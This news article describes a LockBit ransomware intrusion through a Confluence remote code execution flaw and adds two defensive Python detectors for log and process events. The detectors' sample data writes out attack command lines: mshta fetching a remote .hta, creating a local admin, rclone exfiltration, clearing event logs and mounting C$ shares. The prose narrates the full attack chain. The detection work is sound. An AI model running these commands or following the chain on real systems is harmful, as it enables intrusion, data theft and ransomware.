
LockBit Ransomware Unleashed: Hackers Exploit Critical Confluence Server Flaw


A recent cyberattack has highlighted the vulnerabilities of exposed servers, as hackers exploited a critical flaw in an Atlassian Confluence server to unleash LockBit ransomware.

The intrusion began with the exploitation of CVE-2023-22527, a remote code execution vulnerability, allowing the attackers to execute arbitrary commands on the server.

This vulnerability, with a CVSS score of 10.0, was exploited by sending crafted HTTP POST requests to specific endpoints, enabling the execution of malicious Object-Graph Navigation Language (OGNL) expressions.
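Because the exploit travelled over ordinary HTTP POST requests carrying OGNL expressions, a first defensive check is to scan the Confluence (Tomcat) access log for request targets that decode to OGNL syntax. The scanner below is an added example written for this article, not code from the DFIR report or from Atlassian; the log lines are constructed sample data, the `/PLACEHOLDER/endpoint` path stands in for whatever endpoint an investigator is reviewing, and the marker list (`%{`, `${`, `@class@member`, `java.lang.`) is a general OGNL-syntax heuristic rather than a signature for this CVE. The decoder is applied repeatedly so that double-URL-encoded payloads are still caught.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in the Apache/Tomcat "combined" format (sample data, not from
# the report). The third line carries a double-URL-encoded "%{...}" OGNL expression in a query
# parameter of a placeholder path; the first two are ordinary traffic and must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Feb/2024:10:12:01 +0000] "GET /login.action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Feb/2024:10:12:07 +0000] "POST /rest/api/content HTTP/1.1" 200 311 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Feb/2024:10:13:44 +0000] "POST /PLACEHOLDER/endpoint?label=%2525%257B%2523a%253D1%257D HTTP/1.1" 200 209 "-" "python-requests/2.31"
"""

# Combined log format: ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Generic OGNL-syntax markers. These are heuristics: legitimate URLs almost never contain them,
# but every hit still needs an analyst to confirm.
OGNL_MARKERS = {
    "percent_brace": re.compile(r"%\{"),            # %{ expr } expression delimiter
    "dollar_brace": re.compile(r"\$\{"),            # ${ expr } expression delimiter
    "static_ref": re.compile(r"@[\w.$]+@"),         # @some.Class@member static access
    "java_class": re.compile(r"\bjava\.(lang|util|io)\.", re.I),
}


def deep_unquote(s, rounds=3):
    """URL-decode until the string stops changing (bounded), so %2525%257B -> %{ is seen."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_access_log(text):
    """Return one finding per request whose decoded target contains OGNL markers."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        decoded = deep_unquote(m["target"])
        hits = [name for name, rx in OGNL_MARKERS.items() if rx.search(decoded)]
        if hits:
            findings.append({
                "ip": m["ip"],
                "time": m["ts"],
                "method": m["method"],
                "status": int(m["status"]),
                "target": decoded,
                "markers": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['method']} {f['status']} {f['target']}  markers={f['markers']}")
```

The access log records only the request line, so a payload carried purely in the POST body is invisible to it; if a reverse proxy or WAF in front of Confluence logs request bodies, the same `deep_unquote` and marker scan can be pointed at that field. A 200 status on a flagged request is the detail to escalate first, since it indicates the server accepted the expression.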

Confluence remote code execution

Exploitation and Lateral Movement

After gaining initial access, the threat actors executed system discovery commands such as net user and whoami to gather information about user accounts and the current user.

They then attempted to download AnyDesk, but the initial attempt failed because the curl command they used did not complete.

Instead, they used the mshta utility to download a Metasploit stager, establishing command and control with the Metasploit server.

According to the DFIR report, this allowed them to successfully install AnyDesk, providing persistent remote access.

The attackers created a new local administrator account and used it to access the server via RDP, further leveraging tools like Mimikatz to extract credentials.

The attackers moved laterally across the network using RDP, targeting a backup server and a file share server.

On the backup server, they executed a PowerShell script to extract Veeam credentials, while on the file server, they deployed Rclone to exfiltrate data to MEGA.io cloud storage.

After exfiltrating sensitive data, they cleared Windows event logs to evade detection.

Deployment of LockBit Ransomware

The threat actors deployed LockBit ransomware across the environment using multiple methods.

Initially, they manually executed the ransomware on a backup server and a file server over active RDP sessions.

To ensure widespread encryption, they leveraged PDQ Deploy, a legitimate enterprise deployment tool, to automate ransomware distribution across the network.

PDQ Deploy allowed them to execute scripts on remote hosts, effectively encrypting multiple systems at once.

The attackers also created a batch script to mount remote systems’ C$ shares, ensuring a secondary encryption wave in case PDQ Deploy missed any targets.
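Nearly every step described above, from the Confluence service process spawning discovery commands through account creation, Rclone exfiltration and log clearing, down to the batch script mounting C$ shares for the second encryption wave, leaves a process-creation event that endpoint telemetry can match. The detector below is an added example written for this article, not code from the DFIR report; the events are constructed Sysmon-style records, the Java parent-process names and the `wevtutil`/`Clear-EventLog` clearing methods are assumptions (the report says only that logs were cleared), and the share-mount threshold is an arbitrary starting value. It covers both the lateral-movement indicators and the deployment-wave indicators with one set of rules plus one correlation rule.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation events (sample data, not from the report). Only the
# fields the rules need are modelled: Host, ParentImage, Image, CommandLine.
SAMPLE_EVENTS = [
    {"Host": "CONF01", "ParentImage": r"C:\Confluence\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"Host": "CONF01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\net.exe", "CommandLine": "net user"},
    {"Host": "CONF01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\mshta.exe", "CommandLine": "mshta http://198.51.100.20/PLACEHOLDER.hta"},
    {"Host": "CONF01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\net.exe", "CommandLine": "net user svc_backup Placeholder1 /add"},
    {"Host": "CONF01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\net.exe", "CommandLine": "net localgroup administrators svc_backup /add"},
    {"Host": "FILE01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Temp\rclone.exe", "CommandLine": r"rclone.exe copy D:\Shares cloud:backup -q"},
    {"Host": "FILE01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wevtutil.exe", "CommandLine": "wevtutil cl Security"},
    {"Host": "BACKUP01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\net.exe", "CommandLine": r"net use \\WS01\C$ /user:corp\svc_backup Placeholder1"},
    {"Host": "BACKUP01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\net.exe", "CommandLine": r"net use \\WS02\C$ /user:corp\svc_backup Placeholder1"},
    {"Host": "BACKUP01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\net.exe", "CommandLine": r"net use \\WS03\C$ /user:corp\svc_backup Placeholder1"},
    # Benign: an administrator opening a shell from Explorer; must produce no finding.
    {"Host": "WS09", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


WEB_APP_PARENTS = {"java.exe", "tomcat9.exe"}  # assumption: the Confluence service's Java process
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Per-event rules: (rule name, severity, predicate over one event).
RULES = [
    ("web_app_spawn_shell", "high",
     lambda e: _basename(e["ParentImage"]) in WEB_APP_PARENTS and _basename(e["Image"]) in SHELLS),
    ("discovery_command", "low",
     lambda e: re.search(r"\bwhoami\b|\bnet(1)?(\.exe)?\s+user\s*$", e["CommandLine"], re.I)),
    ("mshta_remote_payload", "high",
     lambda e: _basename(e["Image"]) == "mshta.exe" and re.search(r"https?://", e["CommandLine"], re.I)),
    ("local_account_added", "high",
     lambda e: re.search(r"\bnet(1)?(\.exe)?\s+user\s+\S+(\s+\S+)?\s+/add\b", e["CommandLine"], re.I)),
    ("admin_group_modified", "high",
     lambda e: re.search(r"\bnet(1)?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", e["CommandLine"], re.I)),
    ("rclone_transfer", "high",  # rclone copying to any configured remote ("name:" target)
     lambda e: _basename(e["Image"]) == "rclone.exe" and re.search(r"\b(copy|sync|move)\b.*\s\w+:", e["CommandLine"], re.I)),
    ("event_log_cleared", "high",  # assumed clearing methods; the report states only that logs were cleared
     lambda e: re.search(r"\bwevtutil(\.exe)?\s+cl\b|\bClear-EventLog\b", e["CommandLine"], re.I)),
]

ADMIN_SHARE_RE = re.compile(r"\\\\([\w.-]+)\\C\$", re.I)
SHARE_MOUNT_THRESHOLD = 3  # distinct remote hosts mounted from one source; tune per environment


def detect(events):
    """Return a list of findings; each is {rule, severity, host, command_line}."""
    findings = []
    mounts = defaultdict(set)
    for e in events:
        for name, sev, pred in RULES:
            if pred(e):
                findings.append({"rule": name, "severity": sev, "host": e["Host"], "command_line": e["CommandLine"]})
        if re.search(r"\bnet(1)?(\.exe)?\s+use\b", e["CommandLine"], re.I):
            for target in ADMIN_SHARE_RE.findall(e["CommandLine"]):
                mounts[e["Host"]].add(target.lower())
    # Correlation rule: one host mounting the C$ share of many others is the pattern of the
    # batch-script encryption wave described in the article.
    for host, targets in mounts.items():
        if len(targets) >= SHARE_MOUNT_THRESHOLD:
            findings.append({"rule": "mass_admin_share_mount", "severity": "critical", "host": host,
                             "command_line": f"{len(targets)} C$ shares: {', '.join(sorted(targets))}"})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['severity']:8}] {f['rule']:24} {f['host']:9} {f['command_line']}")
```

The per-event rules are deliberately simple substring and regex matches; what makes them useful against a two-hour intrusion is the combination on one host within a short window (web process spawning a shell, then `mshta` fetching from the internet, then a local administrator being added), which a SIEM can express as a sequence over these rule names. The `discovery_command` rule alone is noisy in any environment where administrators run `whoami` and `net user` interactively, which is why it is tagged low and is intended only as supporting context.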

The entire intrusion, from initial access to ransomware deployment, took just over two hours, highlighting the rapid nature of the attack.

The attackers left a ransom note and modified the desktop background on compromised hosts, marking the completion of the ransomware attack.

This incident underscores the importance of securing exposed servers and patching critical vulnerabilities to prevent such swift and devastating attacks.
